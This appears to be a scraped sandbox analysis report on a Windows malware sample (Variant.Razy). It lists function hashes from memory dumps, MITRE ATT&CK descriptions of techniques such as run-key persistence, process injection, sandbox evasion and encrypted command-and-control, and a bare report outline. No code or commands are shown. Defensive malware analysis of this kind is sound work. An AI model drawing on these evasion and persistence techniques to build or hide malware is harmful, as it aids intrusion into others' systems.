Instruction ID: 8a947e4d68012bb6f95e0f7646a0a8a539da9f4266b8f8f34dfd1b0e97def0dc
Opcode Fuzzy Hash: 943603b820f67ce03e7bbc6f08158a2e5130e42e3f3c70eb58fbed280f847946
Instruction Fuzzy Hash: 51518FB0908382CFCB25CF28D5D4B65BF91BB56324F5886E9D9964F2E7C6318442CB22

Uniqueness

Uniqueness Score: -1.00%

Function 00562034, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 440c1688765822c949b5ba2646c45aae23c3c5893bd362bb80217137725a4c6a
Instruction ID: b1fd5dcbeb19fde0ef9412af41488d73a7d97a6bbfca5e6dbf6512ae1f449cb3
Opcode Fuzzy Hash: 440c1688765822c949b5ba2646c45aae23c3c5893bd362bb80217137725a4c6a
Instruction Fuzzy Hash: F731BF71744A02DBD7949F28CC69BE67BA4FF05320F254229FC99D7651DB20EC448B90

Uniqueness

Uniqueness Score: -1.00%

Function 00565364, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e9bd1f01f516d5d0ecf7be246af5bdeb333b1e547814e74a152d3b196107c4
Instruction ID: 1889198f1646cc7abe1299b35f11a390022f658bc9b250f1ff9c1998e2dc3aec
Opcode Fuzzy Hash: 05e9bd1f01f516d5d0ecf7be246af5bdeb333b1e547814e74a152d3b196107c4
Instruction Fuzzy Hash: 78E046B5342A008FC314CF18C6C4E19B7A0BB58B80F128CA0E401CB322F370EC40CA24

Uniqueness

Uniqueness Score: -1.00%

Function 00564A7C, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f9ec86f2b85a509f341929aa33c631cadee6f4ba842f311a8b8759e47c9487f
Instruction ID: d178c05c1aabdf77e5ed89ccce99bac5706a7aeeff2f45819064562376d1002e
Opcode Fuzzy Hash: 6f9ec86f2b85a509f341929aa33c631cadee6f4ba842f311a8b8759e47c9487f
Instruction Fuzzy Hash: 75C04C35295551DBCA95CA59C150B9077F1BB11740B924891E49287551D714D841D908

Uniqueness

Uniqueness Score: -1.00%

Function 00563008, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.823555856.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Variant.Razy.845229.27038.1852

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 0040539A, Relevance: 1.0, Instructions: 953
COMMONCrypto

Function 00405454, Relevance: .9, Instructions: 925
COMMONCrypto

Function 004053FB, Relevance: .9, Instructions: 919
COMMONCrypto

Function 00405429, Relevance: .9, Instructions: 904
COMMONCrypto

Function 00405488, Relevance: .9, Instructions: 901
COMMONCrypto

Function 004054B7, Relevance: .9, Instructions: 897
COMMONCrypto

Function 004054C1, Relevance: .9, Instructions: 894
COMMONCrypto

Function 004054AC, Relevance: .9, Instructions: 894
COMMONCrypto

Function 004054C3, Relevance: .9, Instructions: 892
COMMONCrypto

Function 004054C5, Relevance: .9, Instructions: 891
COMMONCrypto

Function 004054C7, Relevance: .9, Instructions: 890
COMMONCrypto

Function 004054B3, Relevance: .9, Instructions: 890
COMMONCrypto

Function 004054C9, Relevance: .9, Instructions: 889
COMMONCrypto

Function 004054B5, Relevance: .9, Instructions: 889
COMMONCrypto